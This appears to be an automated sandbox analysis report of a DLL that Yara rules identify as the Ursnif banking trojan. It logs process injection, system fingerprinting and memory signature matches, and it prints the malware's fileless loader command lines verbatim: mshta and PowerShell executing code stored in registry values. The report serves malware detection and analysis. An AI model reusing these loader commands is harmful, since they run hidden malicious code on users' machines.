Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 8DCB1580

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP'			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'

May try to detect the Windows Explorer process (often used for injection)

Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001A.00000000.516396060.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.1031755117.00000000017B0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1037190213.00000000038A0000.00000002.00020000.sdmp, explorer.exe, 0000001A.00000000.534817703.00000000011E0000.00000002.00020000.sdmp, control.exe, 0000001F.00000000.520261462.0000019E71160000.00000002.00020000.sdmp, control.exe, 00000025.00000000.800557754.000001D219370000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001A.00000000.506175893.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Queries the installation date of Windows

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00F32E33 cpuid

0_2_00F32E33

Queries the cryptographic machine GUID

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Contains functionality to query local / system time

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00F36632 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,

0_2_00F36632

Contains functionality to query windows version

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00F36F10 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,

0_2_00F36F10

Contains functionality to query the account / user name

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00F32E33 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00F32E33

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
